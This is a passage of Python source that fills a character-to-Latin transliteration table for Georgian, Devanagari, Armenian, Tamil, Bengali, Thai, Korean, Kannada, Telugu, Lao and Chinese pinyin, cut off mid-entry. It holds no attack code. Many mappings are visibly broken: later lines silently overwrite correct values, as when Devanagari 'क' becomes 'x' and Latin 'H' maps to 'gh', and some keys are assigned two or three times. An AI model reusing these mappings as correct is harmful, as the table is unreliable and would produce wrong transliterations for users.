self.trans['რ'] = 'r'\n self.trans['ს'] = 's'\n self.trans['ტ'] = 't'\n self.trans['უ'] = 'u'\n self.trans['ფ'] = 'ph'\n self.trans['ქ'] = 'q'\n self.trans['ღ'] = 'gh'\n for char in u\"ყ\":\n self.trans[char] = u\"q'\"\n self.trans['შ'] = 'sh'\n self.trans['ჩ'] = 'ch'\n self.trans['ც'] = 'ts'\n self.trans['ძ'] = 'dz'\n for char in u\"წ\":\n self.trans[char] = u\"ts'\"\n for char in u\"ჭ\":\n self.trans[char] = u\"ch'\"\n self.trans['ხ'] = 'kh'\n self.trans['ჯ'] = 'j'\n self.trans['ჰ'] = 'h'\n self.trans['ჳ'] = 'w'\n self.trans['ჵ'] = 'o'\n self.trans['ჶ'] = 'f'\n\n # Devanagari\n for char in u\"पप\":\n self.trans[char] = u\"p\"\n self.trans['अ'] = 'a'\n for char in u\"आा\":\n self.trans[char] = u\"aa\"\n self.trans['प'] = 'pa'\n for char in u\"इि\":\n self.trans[char] = u\"i\"\n for char in u\"ईी\":\n self.trans[char] = u\"ii\"\n for char in u\"उु\":\n self.trans[char] = u\"u\"\n for char in u\"ऊू\":\n self.trans[char] = u\"uu\"\n for char in u\"एे\":\n self.trans[char] = u\"e\"\n for char in u\"ऐै\":\n self.trans[char] = u\"ai\"\n for char in u\"ओो\":\n self.trans[char] = u\"o\"\n for char in u\"औौ\":\n self.trans[char] = u\"au\"\n for char in u\"ऋृर\":\n self.trans[char] = u\"r\"\n for char in u\"ॠॄ\":\n self.trans[char] = u\"rr\"\n for char in u\"ऌॢल\":\n self.trans[char] = u\"l\"\n for char in u\"ॡॣ\":\n self.trans[char] = u\"ll\"\n self.trans['क'] = 'k'\n self.trans['ख'] = 'kh'\n self.trans['ग'] = 'g'\n self.trans['घ'] = 'gh'\n self.trans['ङ'] = 'ng'\n self.trans['च'] = 'c'\n self.trans['छ'] = 'ch'\n self.trans['ज'] = 'j'\n self.trans['झ'] = 'jh'\n self.trans['ञ'] = 'ñ'\n for char in u\"टत\":\n self.trans[char] = u\"t\"\n for char in u\"ठथ\":\n self.trans[char] = u\"th\"\n for char in u\"डद\":\n self.trans[char] = u\"d\"\n for char in u\"ढध\":\n self.trans[char] = u\"dh\"\n for char in u\"णन\":\n self.trans[char] = u\"n\"\n self.trans['फ'] = 'ph'\n self.trans['ब'] = 'b'\n self.trans['भ'] = 'bh'\n self.trans['म'] = 'm'\n self.trans['य'] = 'y'\n self.trans['व'] = 'v'\n self.trans['श'] = 'sh'\n for char in u\"षस\":\n self.trans[char] = u\"s\"\n self.trans['ह'] = 'h'\n self.trans['क'] = 'x'\n self.trans['त'] = 'tr'\n self.trans['ज'] = 'gj'\n for char in u\"क़\":\n self.trans[char] = u\"q\"\n self.trans['फ'] = 'f'\n self.trans['ख'] = 'hh'\n self.trans['H'] = 'gh'\n self.trans['ज'] = 'z'\n for char in u\"डढ\":\n self.trans[char] = u\"r\"\n # Devanagari ligatures (possibly incomplete and/or incorrect)\n for char in u\"ख्\":\n self.trans[char] = u\"khn\"\n self.trans['त'] = 'tn'\n for char in u\"द्\":\n self.trans[char] = u\"dn\"\n self.trans['श'] = 'cn'\n for char in 
u\"ह्\":\n self.trans[char] = u\"fn\"\n for char in u\"अँ\":\n self.trans[char] = u\"m\"\n for char in u\"॒॑\":\n self.trans[char] = u\"\"\n self.trans['०'] = '0'\n self.trans['१'] = '1'\n self.trans['२'] = '2'\n self.trans['३'] = '3'\n self.trans['४'] = '4'\n self.trans['५'] = '5'\n self.trans['६'] = '6'\n self.trans['७'] = '7'\n self.trans['८'] = '8'\n self.trans['९'] = '9'\n\n # Armenian\n self.trans['Ա'] = 'A'\n self.trans['ա'] = 'a'\n self.trans['Բ'] = 'B'\n self.trans['բ'] = 'b'\n self.trans['Գ'] = 'G'\n self.trans['գ'] = 'g'\n self.trans['Դ'] = 'D'\n self.trans['դ'] = 'd'\n self.trans['Ե'] = 'Je'\n self.trans['ե'] = 'e'\n self.trans['Զ'] = 'Z'\n self.trans['զ'] = 'z'\n self.trans['Է'] = 'É'\n self.trans['է'] = 'é'\n self.trans['Ը'] = 'Ë'\n self.trans['ը'] = 'ë'\n self.trans['Թ'] = 'Th'\n self.trans['թ'] = 'th'\n self.trans['Ժ'] = 'Zh'\n self.trans['ժ'] = 'zh'\n self.trans['Ի'] = 'I'\n self.trans['ի'] = 'i'\n self.trans['Լ'] = 'L'\n self.trans['լ'] = 'l'\n self.trans['Խ'] = 'Ch'\n self.trans['խ'] = 'ch'\n self.trans['Ծ'] = 'Ts'\n self.trans['ծ'] = 'ts'\n self.trans['Կ'] = 'K'\n self.trans['կ'] = 'k'\n self.trans['Հ'] = 'H'\n self.trans['հ'] = 'h'\n self.trans['Ձ'] = 'Dz'\n self.trans['ձ'] = 'dz'\n self.trans['Ղ'] = 'R'\n self.trans['ղ'] = 'r'\n self.trans['Ճ'] = 'Cz'\n self.trans['ճ'] = 'cz'\n self.trans['Մ'] = 'M'\n self.trans['մ'] = 'm'\n self.trans['Յ'] = 'J'\n self.trans['յ'] = 'j'\n self.trans['Ն'] = 'N'\n self.trans['ն'] = 'n'\n self.trans['Շ'] = 'S'\n self.trans['շ'] = 's'\n self.trans['Շ'] = 'Vo'\n self.trans['շ'] = 'o'\n self.trans['Չ'] = 'Tsh'\n self.trans['չ'] = 'tsh'\n self.trans['Պ'] = 'P'\n self.trans['պ'] = 'p'\n self.trans['Ջ'] = 'Dz'\n self.trans['ջ'] = 'dz'\n self.trans['Ռ'] = 'R'\n self.trans['ռ'] = 'r'\n self.trans['Ս'] = 'S'\n self.trans['ս'] = 's'\n self.trans['Վ'] = 'V'\n self.trans['վ'] = 'v'\n for char in u\"Տ\":\n self.trans[char] = u\"T'\"\n for char in u\"տ\":\n self.trans[char] = u\"t'\"\n self.trans['Ր'] = 'R'\n self.trans['ր'] = 'r'\n self.trans['Ց'] = 'Tsh'\n self.trans['ց'] = 'tsh'\n self.trans['Ւ'] = 'V'\n self.trans['ւ'] = 'v'\n self.trans['Փ'] = 'Ph'\n self.trans['փ'] = 'ph'\n self.trans['Ք'] = 'Kh'\n self.trans['ք'] = 'kh'\n self.trans['Օ'] = 'O'\n self.trans['օ'] = 'o'\n self.trans['Ֆ'] = 'F'\n self.trans['ֆ'] = 'f'\n self.trans['և'] = '&'\n self.trans['՟'] = '.'\n self.trans['՞'] = '?'\n self.trans['՝'] = ';'\n self.trans['՛'] = ''\n\n # Tamil\n for char in u\"க்\":\n self.trans[char] = u\"k\"\n for char in u\"ஙண்ந்ன்\":\n self.trans[char] = u\"n\"\n self.trans['ச'] = 'c'\n for char in u\"ஞ்\":\n self.trans[char] = u\"ñ\"\n for char in u\"ட்\":\n self.trans[char] = u\"th\"\n self.trans['த'] = 't'\n self.trans['ப'] = 'p'\n for char in u\"ம்\":\n self.trans[char] = u\"m\"\n for char in u\"ய்\":\n self.trans[char] = u\"y\"\n for char in u\"ர்ழ்ற\":\n self.trans[char] = u\"r\"\n for char in u\"ல்ள\":\n self.trans[char] = u\"l\"\n for char in u\"வ்\":\n self.trans[char] = u\"v\"\n self.trans['ஜ'] = 'j'\n self.trans['ஷ'] = 'sh'\n self.trans['ஸ'] = 's'\n self.trans['ஹ'] = 'h'\n for char in u\"க்ஷ\":\n self.trans[char] = u\"x\"\n self.trans['அ'] = 'a'\n self.trans['ஆ'] = 'aa'\n self.trans['இ'] = 'i'\n self.trans['ஈ'] = 'ii'\n self.trans['உ'] = 'u'\n self.trans['ஊ'] = 'uu'\n self.trans['எ'] = 'e'\n self.trans['ஏ'] = 'ee'\n self.trans['ஐ'] = 'ai'\n self.trans['ஒ'] = 'o'\n self.trans['ஓ'] = 'oo'\n self.trans['ஔ'] = 'au'\n self.trans['ஃ'] = ''\n\n # Bengali\n self.trans['অ'] = 'ô'\n for char in u\"আা\":\n self.trans[char] = u\"a\"\n for char in u\"ইিঈী\":\n 
self.trans[char] = u\"i\"\n for char in u\"উুঊূ\":\n self.trans[char] = u\"u\"\n for char in u\"ঋৃ\":\n self.trans[char] = u\"ri\"\n for char in u\"এেয়\":\n self.trans[char] = u\"e\"\n for char in u\"ঐৈ\":\n self.trans[char] = u\"oi\"\n for char in u\"ওো\":\n self.trans[char] = u\"o\"\n for char in u\"ঔৌ\":\n self.trans[char] = \"ou\"\n self.trans['্'] = ''\n self.trans['ৎ'] = 't'\n self.trans['ং'] = 'n'\n self.trans['ঃ'] = 'h'\n self.trans['ঁ'] = 'ñ'\n self.trans['ক'] = 'k'\n self.trans['খ'] = 'kh'\n self.trans['গ'] = 'g'\n self.trans['ঘ'] = 'gh'\n self.trans['ঙ'] = 'ng'\n self.trans['চ'] = 'ch'\n self.trans['ছ'] = 'chh'\n self.trans['জ'] = 'j'\n self.trans['ঝ'] = 'jh'\n self.trans['ঞ'] = 'n'\n for char in u\"টত\":\n self.trans[char] = u\"t\"\n for char in u\"ঠথ\":\n self.trans[char] = u\"th\"\n for char in u\"ডদ\":\n self.trans[char] = u\"d\"\n for char in u\"ঢধ\":\n self.trans[char] = u\"dh\"\n for char in u\"ণন\":\n self.trans[char] = u\"n\"\n self.trans['প'] = 'p'\n self.trans['ফ'] = 'ph'\n self.trans['ব'] = 'b'\n self.trans['ভ'] = 'bh'\n self.trans['ম'] = 'm'\n self.trans['য'] = 'dzh'\n self.trans['র'] = 'r'\n self.trans['ল'] = 'l'\n self.trans['শ'] = 's'\n self.trans['হ'] = 'h'\n for char in u\"য়\":\n self.trans[char] = u\"-\"\n for char in u\"ড়\":\n self.trans[char] = u\"r\"\n self.trans['ঢ'] = 'rh'\n self.trans['০'] = '0'\n self.trans['১'] = '1'\n self.trans['২'] = '2'\n self.trans['৩'] = '3'\n self.trans['৪'] = '4'\n self.trans['৫'] = '5'\n self.trans['৬'] = '6'\n self.trans['৭'] = '7'\n self.trans['৮'] = '8'\n self.trans['৯'] = '9'\n\n # Thai (because of complications of the alphabet, self.transliterations\n # are very imprecise here)\n self.trans['ก'] = 'k'\n for char in u\"ขฃคฅฆ\":\n self.trans[char] = u\"kh\"\n self.trans['ง'] = 'ng'\n for char in u\"จฉชฌ\":\n self.trans[char] = u\"ch\"\n for char in u\"ซศษส\":\n self.trans[char] = u\"s\"\n for char in u\"ญย\":\n self.trans[char] = u\"y\"\n for char in u\"ฎด\":\n self.trans[char] = u\"d\"\n for char in u\"ฏต\":\n self.trans[char] = u\"t\"\n for char in u\"ฐฑฒถทธ\":\n self.trans[char] = u\"th\"\n for char in u\"ณน\":\n self.trans[char] = u\"n\"\n self.trans['บ'] = 'b'\n self.trans['ป'] = 'p'\n for char in u\"ผพภ\":\n self.trans[char] = u\"ph\"\n for char in u\"ฝฟ\":\n self.trans[char] = u\"f\"\n self.trans['ม'] = 'm'\n self.trans['ร'] = 'r'\n self.trans['ฤ'] = 'rue'\n self.trans['ๅ'] = ':'\n for char in u\"ลฬ\":\n self.trans[char] = u\"l\"\n self.trans['ฦ'] = 'lue'\n self.trans['ว'] = 'w'\n for char in u\"หฮ\":\n self.trans[char] = u\"h\"\n self.trans['อ'] = ''\n self.trans['ร'] = 'ü'\n self.trans['ว'] = 'ua'\n for char in u\"อวโิ\":\n self.trans[char] = u\"o\"\n for char in u\"ะัา\":\n self.trans[char] = u\"a\"\n self.trans['ว'] = 'u'\n self.trans['ำ'] = 'am'\n self.trans['ิ'] = 'i'\n self.trans['ี'] = 'i:'\n self.trans['ึ'] = 'ue'\n self.trans['ื'] = 'ue:'\n self.trans['ุ'] = 'u'\n self.trans['ู'] = 'u:'\n for char in u\"เ็\":\n self.trans[char] = u\"e\"\n self.trans['แ'] = 'ae'\n for char in u\"ใไ\":\n self.trans[char] = u\"ai\"\n for char in u\"่้๊๋็์\":\n self.trans[char] = u\"\"\n self.trans['ฯ'] = '.'\n self.trans['ๆ'] = '(2)'\n\n # Korean (Revised Romanization system within possible, incomplete)\n self.trans['국'] = 'guk'\n self.trans['명'] = 'myeong'\n self.trans['검'] = 'geom'\n self.trans['타'] = 'ta'\n self.trans['분'] = 'bun'\n self.trans['사'] = 'sa'\n self.trans['류'] = 'ryu'\n self.trans['포'] = 'po'\n self.trans['르'] = 'reu'\n self.trans['투'] = 'tu'\n self.trans['갈'] = 'gal'\n self.trans['어'] = 'eo'\n 
self.trans['노'] = 'no'\n self.trans['웨'] = 'we'\n self.trans['이'] = 'i'\n self.trans['라'] = 'ra'\n self.trans['틴'] = 'tin'\n self.trans['루'] = 'ru'\n self.trans['마'] = 'ma'\n self.trans['니'] = 'ni'\n self.trans['아'] = 'a'\n self.trans['독'] = 'dok'\n self.trans['일'] = 'il'\n self.trans['모'] = 'mo'\n self.trans['크'] = 'keu'\n self.trans['샤'] = 'sya'\n self.trans['영'] = 'yeong'\n self.trans['불'] = 'bul'\n self.trans['가'] = 'ga'\n self.trans['리'] = 'ri'\n self.trans['그'] = 'geu'\n self.trans['지'] = 'ji'\n self.trans['야'] = 'ya'\n self.trans['바'] = 'ba'\n self.trans['슈'] = 'syu'\n self.trans['키'] = 'ki'\n self.trans['프'] = 'peu'\n self.trans['랑'] = 'rang'\n self.trans['스'] = 'seu'\n self.trans['로'] = 'ro'\n self.trans['메'] = 'me'\n self.trans['역'] = 'yeok'\n self.trans['도'] = 'do'\n\n # Kannada\n self.trans[u\"ಅ\"] = u\"a\"\n for char in u\"ಆಾ\":\n self.trans[char] = u\"aa\"\n for char in u\"ಇಿ\":\n self.trans[char] = u\"i\"\n for char in u\"ಈೀ\":\n self.trans[char] = u\"ii\"\n for char in u\"ಉು\":\n self.trans[char] = u\"u\"\n for char in u\"ಊೂ\":\n self.trans[char] = u\"uu\"\n for char in u\"ಋೂ\":\n self.trans[char] = u\"r'\"\n for char in u\"ಎೆ\":\n self.trans[char] = u\"e\"\n for char in u\"ಏೇ\":\n self.trans[char] = u\"ee\"\n for char in u\"ಐೈ\":\n self.trans[char] = u\"ai\"\n for char in u\"ಒೊ\":\n self.trans[char] = u\"o\"\n for char in u\"ಓೋ\":\n self.trans[char] = u\"oo\"\n for char in u\"ಔೌ\":\n self.trans[char] = u\"au\"\n self.trans[u\"ಂ\"] = u\"m'\"\n self.trans[u\"ಃ\"] = u\"h'\"\n self.trans[u\"ಕ\"] = u\"k\"\n self.trans[u\"ಖ\"] = u\"kh\"\n self.trans[u\"ಗ\"] = u\"g\"\n self.trans[u\"ಘ\"] = u\"gh\"\n self.trans[u\"ಙ\"] = u\"ng\"\n self.trans[u\"ಚ\"] = u\"c\"\n self.trans[u\"ಛ\"] = u\"ch\"\n self.trans[u\"ಜ\"] = u\"j\"\n self.trans[u\"ಝ\"] = u\"ny\"\n self.trans[u\"ಟ\"] = u\"tt\"\n self.trans[u\"ಠ\"] = u\"tth\"\n self.trans[u\"ಡ\"] = u\"dd\"\n self.trans[u\"ಢ\"] = u\"ddh\"\n self.trans[u\"ಣ\"] = u\"nn\"\n self.trans[u\"ತ\"] = u\"t\"\n self.trans[u\"ಥ\"] = u\"th\"\n self.trans[u\"ದ\"] = u\"d\"\n self.trans[u\"ಧ\"] = u\"dh\"\n self.trans[u\"ನ\"] = u\"n\"\n self.trans[u\"ಪ\"] = u\"p\"\n self.trans[u\"ಫ\"] = u\"ph\"\n self.trans[u\"ಬ\"] = u\"b\"\n self.trans[u\"ಭ\"] = u\"bh\"\n self.trans[u\"ಮ\"] = u\"m\"\n self.trans[u\"ಯ\"] = u\"y\"\n self.trans[u\"ರ\"] = u\"r\"\n self.trans[u\"ಲ\"] = u\"l\"\n self.trans[u\"ವ\"] = u\"v\"\n self.trans[u\"ಶ\"] = u\"sh\"\n self.trans[u\"ಷ\"] = u\"ss\"\n self.trans[u\"ಸ\"] = u\"s\"\n self.trans[u\"ಹ\"] = u\"h\"\n self.trans[u\"ಳ\"] = u\"ll\"\n self.trans[u\"೦\"] = u\"0\"\n self.trans[u\"೧\"] = u\"1\"\n self.trans[u\"೨\"] = u\"2\"\n self.trans[u\"೩\"] = u\"3\"\n self.trans[u\"೪\"] = u\"4\"\n self.trans[u\"೫\"] = u\"5\"\n self.trans[u\"೬\"] = u\"6\"\n self.trans[u\"೭\"] = u\"7\"\n self.trans[u\"೮\"] = u\"8\"\n self.trans[u\"೯\"] = u\"9\"\n # Telugu\n self.trans['అ'] = 'a'\n for char in u\"ఆా\":\n self.trans[char] = u\"aa\"\n for char in u\"ఇి\":\n self.trans[char] = u\"i\"\n for char in u\"ఈీ\":\n self.trans[char] = u\"ii\"\n for char in u\"ఉు\":\n self.trans[char] = u\"u\"\n for char in u\"ఊూ\":\n self.trans[char] = u\"uu\"\n for char in u\"ఋృ\":\n self.trans[char] = u\"r'\"\n for char in u\"ౠౄ\":\n self.trans[char] = u'r\"'\n self.trans[u\"ఌ\"] = u\"l'\"\n self.trans[u\"ౡ\"] = u'l\"'\n for char in u\"ఎె\":\n self.trans[char] = u\"e\"\n for char in u\"ఏే\":\n self.trans[char] = u\"ee\"\n for char in u\"ఐై\":\n self.trans[char] = u\"ai\"\n for char in u\"ఒొ\":\n self.trans[char] = u\"o\"\n for char in u\"ఓో\":\n self.trans[char] = u\"oo\"\n for char in 
u\"ఔౌ\":\n self.trans[char] = u\"au\"\n self.trans[u\"ం\"] = u\"'\"\n self.trans[u\"ః\"] = u'\"'\n self.trans[u\"క\"] = u\"k\"\n self.trans[u\"ఖ\"] = u\"kh\"\n self.trans[u\"గ\"] = u\"g\"\n self.trans[u\"ఘ\"] = u\"gh\"\n self.trans[u\"ఙ\"] = u\"ng\"\n self.trans[u\"చ\"] = u\"ts\"\n self.trans[u\"ఛ\"] = u\"tsh\"\n self.trans[u\"జ\"] = u\"j\"\n self.trans[u\"ఝ\"] = u\"jh\"\n self.trans[u\"ఞ\"] = u\"ñ\"\n for char in u\"టత\":\n self.trans[char] = u\"t\"\n for char in u\"ఠథ\":\n self.trans[char] = u\"th\"\n for char in u\"డద\":\n self.trans[char] = u\"d\"\n for char in u\"ఢధ\":\n self.trans[char] = u\"dh\"\n for char in u\"ణన\":\n self.trans[char] = u\"n\"\n self.trans[u\"ప\"] = u\"p\"\n self.trans[u\"ఫ\"] = u\"ph\"\n self.trans[u\"బ\"] = u\"b\"\n self.trans[u\"భ\"] = u\"bh\"\n self.trans[u\"మ\"] = u\"m\"\n self.trans[u\"య\"] = u\"y\"\n for char in u\"రఱ\":\n self.trans[char] = u\"r\"\n for char in u\"లళ\":\n self.trans[char] = u\"l\"\n self.trans[u\"వ\"] = u\"v\"\n self.trans[u\"శ\"] = u\"sh\"\n for char in u\"షస\":\n self.trans[char] = u\"s\"\n self.trans[u\"హ\"] = u\"h\"\n self.trans[u\"్\"] = \"\"\n for char in u\"ంఁ\":\n self.trans[char] = u\"^\"\n self.trans[u\"ః\"] = u\"-\"\n self.trans[u\"౦\"] = u\"0\"\n self.trans[u\"౧\"] = u\"1\"\n self.trans[u\"౨\"] = u\"2\"\n self.trans[u\"౩\"] = u\"3\"\n self.trans[u\"౪\"] = u\"4\"\n self.trans[u\"౫\"] = u\"5\"\n self.trans[u\"౬\"] = u\"6\"\n self.trans[u\"౭\"] = u\"7\"\n self.trans[u\"౮\"] = u\"8\"\n self.trans[u\"౯\"] = u\"9\"\n self.trans[u\"౹\"] = u\"1/4\"\n self.trans[u\"౺\"] = u\"1/2\"\n self.trans[u\"౻\"] = u\"3/4\"\n self.trans[u\"౼\"] = u\"1/16\"\n self.trans[u\"౽\"] = u\"1/8\"\n self.trans[u\"౾\"] = u\"3/16\"\n # Lao - note: pronounciation in initial position is used;\n # different pronounciation in final position is ignored\n self.trans[u\"ກ\"] = \"k\"\n for char in u\"ຂຄ\":\n self.trans[char] = \"kh\"\n self.trans[u\"ງ\"] = \"ng\"\n self.trans[u\"ຈ\"] = \"ch\"\n for char in u\"ສຊ\":\n self.trans[char] = \"s\"\n self.trans[u\"ຍ\"] = \"ny\"\n self.trans[u\"ດ\"] = \"d\"\n self.trans[u\"ຕ\"] = \"t\"\n for char in u\"ຖທ\":\n self.trans[char] = \"th\"\n self.trans[u\"ນ\"] = \"n\"\n self.trans[u\"ບ\"] = \"b\"\n self.trans[u\"ປ\"] = \"p\"\n for char in u\"ຜພ\":\n self.trans[char] = \"ph\"\n for char in u\"ຝຟ\":\n self.trans[char] = \"f\"\n for char in u\"ມໝ\":\n self.trans[char] = \"m\"\n self.trans[u\"ຢ\"] = \"y\"\n for char in u\"ຣຼ\":\n self.trans[char] = \"r\"\n for char in u\"ລຼ\":\n self.trans[char] = \"l\"\n self.trans[u\"ວ\"] = \"v\"\n self.trans['ຮ'] = 'h'\n self.trans[u\"ອ\"] = \"'\"\n for char in u\"ະັ\":\n self.trans[char] = \"a\"\n self.trans[u\"ິ\"] = \"i\"\n self.trans[u\"ຶ\"] = \"ue\"\n self.trans[u\"ຸ\"] = \"u\"\n self.trans[u\"ເ\"] = u\"é\"\n self.trans[u\"ແ\"] = u\"è\"\n for char in u\"ໂົາໍ\":\n self.trans[char] = \"o\"\n self.trans[u\"ຽ\"] = \"ia\"\n self.trans[u\"ເຶ\"] = \"uea\"\n self.trans[u\"ຍ\"] = \"i\"\n for char in u\"ໄໃ\":\n self.trans[char] = \"ai\"\n self.trans[u\"ຳ\"] = \"am\"\n self.trans[u\"າ\"] = \"aa\"\n self.trans[u\"ີ\"] = \"ii\"\n self.trans[u\"ື\"] = \"yy\"\n self.trans[u\"ູ\"] = \"uu\"\n self.trans[u\"ເ\"] = \"e\"\n self.trans[u\"ແ\"] = \"ei\"\n self.trans[u\"໐\"] = \"0\"\n self.trans[u\"໑\"] = \"1\"\n self.trans[u\"໒\"] = \"2\"\n self.trans[u\"໓\"] = \"3\"\n self.trans[u\"໔\"] = \"4\"\n self.trans[u\"໕\"] = \"5\"\n self.trans[u\"໖\"] = \"6\"\n self.trans[u\"໗\"] = \"7\"\n self.trans[u\"໘\"] = \"8\"\n self.trans[u\"໙\"] = \"9\"\n # Chinese -- note: incomplete\n for char in u\"埃挨哎唉哀皑癌蔼矮艾碍爱隘\":\n 
self.trans[char] = u\"ai\"\n for char in u\"鞍氨安俺按暗岸胺案\":\n self.trans[char] = u\"an\"\n for char in u\"肮昂盎\":\n self.trans[char] = u\"ang\"\n for char in u\"凹敖熬翱袄傲奥懊澳\":\n self.trans[char] = u\"ao\"\n for char in u\"芭捌扒叭吧笆八疤巴拔跋靶把耙坝霸罢爸\":\n self.trans[char] = u\"ba\"\n for char in u\"白柏百摆佰败拜稗\":\n self.trans[char] = u\"bai\"\n for char in u\"斑班搬扳般颁板版扮拌伴瓣半办绊\":\n self.trans[char] = u\"ban\"\n for char in u\"邦帮梆榜膀绑棒磅蚌镑傍谤\":\n self.trans[char] = u\"bang\"\n for char in u\"苞胞包褒剥薄雹保堡饱宝抱报暴豹鲍爆\":\n self.trans[char] = u\"bao\"\n for char in u\"杯碑悲卑北辈背贝钡倍狈备惫焙被\":\n self.trans[char] = u\"bei\"\n for char in u\"奔苯本笨\":\n self.trans[char] = u\"ben\"\n for char in u\"崩绷甭泵蹦迸\":\n self.trans[char] = u\"beng\"\n for char in u\"逼鼻比鄙笔彼碧蓖蔽毕毙毖币庇痹闭敝弊必辟壁臂避陛\":\n self.trans[char] = u\"bi\"\n for char in u\"鞭边编贬扁便变卞辨辩辫遍\":\n self.trans[char] = u\"bian\"\n for char in u\"标彪膘表\":\n self.trans[char] = u\"biao\"\n for char in u\"鳖憋别瘪\":\n self.trans[char] = u\"bie\"\n for char in u\"彬斌濒滨宾摈\":\n self.trans[char] = u\"bin\"\n for char in u\"兵冰柄丙秉饼炳病并\":\n self.trans[char] = u\"bing\"\n for char in u\"玻菠播拨钵波博勃搏铂箔伯帛舶脖膊渤泊驳捕卜亳\":\n self.trans[char] = u\"bo\"\n for char in u\"哺补埠不布步簿部怖\":\n self.trans[char] = u\"bu\"\n for char in u\"猜裁材才财睬踩采彩菜蔡\":\n self.trans[char] = u\"cai\"\n for char in u\"餐参蚕残惭惨灿\":\n self.trans[char] = u\"can\"\n for char in u\"苍舱仓沧藏\":\n self.trans[char] = u\"cang\"\n for char in u\"操糙槽曹草\":\n self.trans[char] = u\"cao\"\n for char in u\"厕策侧册测\":\n self.trans[char] = u\"ce\"\n for char in u\"层蹭\":\n self.trans[char] = u\"ceng\"\n for char in u\"插叉茬茶查碴搽察岔差诧\":\n self.trans[char] = u\"cha\"\n for char in u\"拆柴豺\":\n self.trans[char] = u\"chai\"\n for char in u\"搀掺蝉馋谗缠铲产阐颤\":\n self.trans[char] = u\"chan\"\n for char in u\"昌猖场尝常长偿肠厂敞畅唱倡\":\n self.trans[char] = u\"chang\"\n for char in u\"超抄钞朝嘲潮巢吵炒\":\n self.trans[char] = u\"chao\"\n for char in u\"车扯撤掣彻澈\":\n self.trans[char] = u\"che\"\n for char in u\"郴臣辰尘晨忱沉陈趁衬\":\n self.trans[char] = u\"chen\"\n for char in u\"撑称城橙成呈乘程惩澄诚承逞骋秤\":\n self.trans[char] = u\"cheng\"\n for char in u\"吃痴持匙池迟弛驰耻齿侈尺赤翅斥炽\":\n self.trans[char] = u\"chi\"\n for char in u\"充冲虫崇宠\":\n self.trans[char] = u\"chong\"\n for char in u\"抽酬畴踌稠愁筹仇绸瞅丑臭\":\n self.trans[char] = u\"chou\"\n for char in u\"初出橱厨躇锄雏滁除楚储矗搐触处\":\n self.trans[char] = u\"chu\"\n self.trans['揣'] = 'chuai'\n for char in u\"川穿椽传船喘串\":\n self.trans[char] = u\"chuan\"\n for char in u\"疮窗幢床闯创\":\n self.trans[char] = u\"chuang\"\n for char in u\"吹炊捶锤垂\":\n self.trans[char] = u\"chui\"\n for char in u\"春椿醇唇淳纯蠢\":\n self.trans[char] = u\"chun\"\n for char in u\"戳绰\":\n self.trans[char] = u\"chuo\"\n for char in u\"疵茨磁雌辞慈瓷词此刺赐次\":\n self.trans[char] = u\"ci\"\n for char in u\"聪葱囱匆从丛\":\n self.trans[char] = u\"cong\"\n self.trans['凑'] = 'cou'\n for char in u\"粗醋簇促\":\n self.trans[char] = u\"cu\"\n for char in u\"蹿篡窜\":\n self.trans[char] = u\"cuan\"\n for char in u\"摧崔催脆瘁粹淬翠\":\n self.trans[char] = u\"cui\"\n for char in u\"村存寸\":\n self.trans[char] = u\"cun\"\n for char in u\"磋撮搓措挫错\":\n self.trans[char] = u\"cuo\"\n for char in u\"搭达答瘩打大\":\n self.trans[char] = u\"da\"\n for char in u\"呆歹傣戴带殆代贷袋待逮怠\":\n self.trans[char] = u\"dai\"\n for char in u\"耽担丹单郸掸胆旦氮但惮淡诞弹蛋儋\":\n self.trans[char] = u\"dan\"\n for char in u\"当挡党荡档\":\n self.trans[char] = u\"dang\"\n for char in u\"刀捣蹈倒岛祷导到稻悼道盗\":\n self.trans[char] = u\"dao\"\n for char in u\"德得的\":\n self.trans[char] = u\"de\"\n for char in u\"蹬灯登等瞪凳邓\":\n self.trans[char] = u\"deng\"\n for char in u\"堤低滴迪敌笛狄涤翟嫡抵底地蒂第帝弟递缔\":\n self.trans[char] = u\"di\"\n for char in 
u\"颠掂滇碘点典靛垫电佃甸店惦奠淀殿\":\n self.trans[char] = u\"dian\"\n for char in u\"碉叼雕凋刁掉吊钓调\":\n self.trans[char] = u\"diao\"\n for char in u\"跌爹碟蝶迭谍叠\":\n self.trans[char] = u\"die\"\n for char in u\"丁盯叮钉顶鼎锭定订\":\n self.trans[char] = u\"ding\"\n self.trans['丢'] = 'diu'\n for char in u\"东冬董懂动栋侗恫冻洞\":\n self.trans[char] = u\"dong\"\n for char in u\"兜抖斗陡豆逗痘\":\n self.trans[char] = u\"dou\"\n for char in u\"都督毒犊独读堵睹赌杜镀肚度渡妒\":\n self.trans[char] = u\"du\"\n for char in u\"端短锻段断缎\":\n self.trans[char] = u\"duan\"\n for char in u\"堆兑队对\":\n self.trans[char] = u\"dui\"\n for char in u\"墩吨蹲敦顿囤钝盾遁\":\n self.trans[char] = u\"dun\"\n for char in u\"掇哆多夺垛躲朵跺舵剁惰堕\":\n self.trans[char] = u\"duo\"\n for char in u\"蛾峨鹅俄额讹娥恶厄扼遏鄂饿\":\n self.trans[char] = u\"e\"\n for char in u\"恩嗯\":\n self.trans[char] = u\"en\"\n for char in u\"而儿耳尔饵洱二贰\":\n self.trans[char] = u\"er\"\n for char in u\"发罚筏伐乏阀法珐\":\n self.trans[char] = u\"fa\"\n for char in u\"藩帆番翻樊矾钒繁凡烦反返范贩犯饭泛\":\n self.trans[char] = u\"fan\"\n for char in u\"坊芳方肪房防妨仿访纺放\":\n self.trans[char] = u\"fang\"\n for char in u\"菲非啡飞肥匪诽吠肺废沸费\":\n self.trans[char] = u\"fei\"\n for char in u\"芬酚吩氛分纷坟焚汾粉奋份忿愤粪\":\n self.trans[char] = u\"fen\"\n for char in u\"丰封枫蜂峰锋风疯烽逢冯缝讽奉凤\":\n self.trans[char] = u\"feng\"\n self.trans['佛'] = 'fo'\n self.trans['否'] = 'fou'\n for char in u\"夫敷肤孵扶拂辐幅氟符伏俘服浮涪福袱弗甫抚辅俯釜斧脯腑府腐赴副覆赋复傅付阜父腹负富讣附妇缚咐\":\n self.trans[char] = u\"fu\"\n for char in u\"噶嘎\":\n self.trans[char] = u\"ga\"\n for char in u\"该改概钙盖溉\":\n self.trans[char] = u\"gai\"\n for char in u\"干甘杆柑竿肝赶感秆敢赣\":\n self.trans[char] = u\"gan\"\n for char in u\"冈刚钢缸肛纲岗港杠\":\n self.trans[char] = u\"gang\"\n for char in u\"篙皋高膏羔糕搞镐稿告\":\n self.trans[char] = u\"gao\"\n for char in u\"哥歌搁戈鸽胳疙割革葛格蛤阁隔铬个各\":\n self.trans[char] = u\"ge\"\n self.trans['给'] = 'gei'\n for char in u\"根跟\":\n self.trans[char] = 